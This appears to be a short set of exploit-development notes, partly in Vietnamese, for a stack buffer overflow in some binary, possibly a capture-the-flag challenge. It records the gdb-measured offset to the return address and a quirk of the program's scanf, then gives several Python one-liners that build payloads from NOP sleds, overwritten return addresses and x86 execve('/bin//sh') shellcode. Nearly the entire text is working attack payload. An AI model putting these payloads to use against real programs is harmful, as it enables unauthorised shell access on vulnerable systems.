dung gdb debug ta thay:
khoang cach tu buff den ret = 140
ham scanf doc vao input va lay 1 byte cuoi cua input
vd: input = 611 = 0x263 -> gia tri doc dc la 0x63 (1byte = 2 kytu trong hex)
d13b
print 'A'*113+'BBBB'
shell = '\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'
python -c "print '-1\n'+'\x90'*113+'\xb0\xd1\xff\xff'+'\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'"

python -c "print '-1\n'+ '\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80' + '\x90'*(113-21)+'BBBB'"

python -c "print 'A'*52 + '\xb6\xd1\xff\xff' + '\x90\x90' + '\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80' + '\n\n'"

python -c "print '\x90'*32 + 'BBBB' + '\x90'*16 + '\xb0\xd1\xff\xff' + '\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80' + '\n48.5647049\n'"

print '-1\n'+'A'*113+'\x30\xdb\xd9\xf7'



print '-1\n'+'A'*113+'BBBB'
